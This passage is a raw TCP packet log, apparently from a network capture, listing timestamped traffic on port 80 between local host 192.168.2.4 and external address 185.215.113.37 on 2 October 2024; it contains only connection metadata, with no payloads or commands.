Oct 2, 2024 18:19:20.540524960 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.540530920 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.540549994 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.540568113 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.540587902 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.540790081 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.540821075 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.540828943 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.540848017 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.540858030 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.540884972 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.540899992 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.540913105 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.540935040 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.540951014 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.540980101 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.540993929 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.541017056 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.541030884 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.541038036 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.541054010 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.541065931 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.541085958 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.541174889 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.541218996 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.541318893 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.541356087 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.541368008 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.541385889 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.541403055 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.541414022 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.541423082 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.541441917 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.541475058 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.541507959 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.541533947 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.541575909 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.541583061 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.541600943 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.541619062 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.541627884 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.541635990 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.541656017 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.541665077 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.541692019 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.541743994 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.541758060 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.541785955 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.541798115 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.541810036 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.541840076 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.554770947 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.554801941 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.554821014 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.554831028 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.554872036 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.554922104 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.554939985 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.554963112 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.554971933 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.554990053 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.555006027 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.555011988 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.555038929 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.592747927 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.592763901 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.592789888 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.592820883 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.592820883 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.592859983 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.592874050 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.592897892 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.592905998 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.592916965 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.592940092 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.592950106 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.592963934 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.592984915 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.592993021 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.593004942 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.593020916 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.593029022 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.593046904 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.593055964 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.593080997 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.593090057 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.593105078 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.593123913 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.593132973 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.593141079 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.593166113 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.593219995 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.593238115 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.593254089 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.593271971 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.593277931 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.593297958 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.593307018 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.593332052 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.593393087 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.593406916 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.593430996 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.593439102 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.593455076 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.593470097 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.593478918 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.593502998 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.593537092 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.593550920 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.593571901 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.593581915 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.593590975 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.593610048 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.593619108 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.593638897 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.593647003 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.593664885 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.593672991 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.593698025 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.593883991 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.593898058 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.593920946 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.593933105 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.593940973 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.593961000 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.593970060 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.593987942 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.593997002 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.594016075 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.594023943 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.594042063 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.594050884 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.594069004 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.594078064 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.594096899 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.594105959 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.594125986 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.594134092 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.594160080 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.594230890 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.594244957 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.594264984 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.594271898 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.594280005 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.594304085 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.594361067 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.594373941 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.594397068 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.594408035 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.594415903 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.594427109 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.594449997 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.594461918 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.594599962 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.594628096 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.594635963 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.594655037 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.594662905 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.594681978 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.594690084 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.594708920 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.594717979 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.594736099 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.594743967 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.594763041 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.594772100 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.594793081 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.594799995 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.594827890 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.594834089 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.594851971 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.594870090 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.594882965 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.594890118 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.594907045 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.594924927 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.594938993 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.594945908 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.594959021 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.594980001 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.594994068 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.595289946 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.595303059 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.595326900 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.595335007 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.595344067 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.595359087 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.595367908 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.595391035 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.595401049 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.595426083 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.595451117 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.595463037 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.595468998 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.595488071 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.595496893 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.595516920 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.595525980 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.595545053 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.595554113 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.595572948 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.595582008 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.595601082 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.595609903 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.595628977 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.595638037 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.595657110 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.595668077 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.595693111 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.595890999 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.595904112 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.595928907 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.595936060 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.595946074 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.595966101 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.595973969 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.595993042 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.596002102 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.596020937 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.596029043 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.596049070 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.596056938 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.596081018 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.596086979 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.596112967 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.632757902 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.632821083 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.632833958 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.632847071 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.632853985 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.632880926 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.632905006 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.632917881 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.632939100 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.632956982 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.633001089 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.633013964 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.633039951 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.633050919 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.633708954 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.633728027 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.633753061 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.633764982 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.633774996 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.633801937 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.633959055 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.633974075 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.633997917 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.634013891 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.634020090 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.634040117 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.634049892 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.634076118 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.634165049 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.634187937 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.634206057 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.634223938 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.634234905 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.634249926 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.634269953 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.634279966 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.634300947 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.634311914 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.634321928 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.634341002 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.634356976 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.634371996 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.634378910 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.634412050 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.634445906 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.634471893 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.634489059 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.634495974 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.634506941 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.634524107 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.634541988 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.634557009 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.634587049 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.634605885 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.634624004 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.634635925 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.647250891 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.647305965 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.647320986 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.647335052 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.647345066 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.647371054 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.647423029 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.647435904 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.647455931 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.647475004 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.647480965 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.647500038 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.647510052 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.647535086 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.685302973 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.685323000 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.685350895 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.685446024 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.685460091 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.685483932 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.685496092 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.685513973 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.685523033 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.685547113 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.685558081 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.685568094 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.685581923 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.685604095 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.685620070 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.685626030 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.685646057 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.685655117 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.685678959 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.685703039 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.685717106 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.685734034 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.685749054 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.685756922 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.685796022 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.686009884 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.686024904 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.686044931 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.686058044 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.686064005 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.686078072 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.686100960 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.686114073 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.686120033 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.686132908 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.686155081 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.686168909 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.686176062 CEST	49737	80	192.168.2.4	185.215.113.37
